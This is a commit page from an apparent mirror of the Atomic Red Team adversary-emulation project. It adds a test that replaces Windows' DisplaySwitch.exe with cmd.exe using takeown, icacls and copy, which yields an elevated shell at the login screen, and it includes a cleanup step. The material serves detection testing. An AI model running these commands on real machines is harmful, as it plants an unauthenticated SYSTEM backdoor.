security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update T1546.008.yaml (#3136)

Browse Source 
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
This commit is contained in:
Casey Hennings
2025-08-11 21:05:08 -04:00
committed by GitHub
parent b49c4bbf7e
commit c1705f86e3
1 changed files with 15 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1546.008/T1546.008.yaml
+15
View File
@@ -169,3 +169,18 @@ atomic_tests:
copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe
name: command_prompt
elevation_required: true
- name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
description: |
Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\DisplaySwitch.exe /A
icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
cleanup_command: |
copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
name: command_prompt
elevation_required: true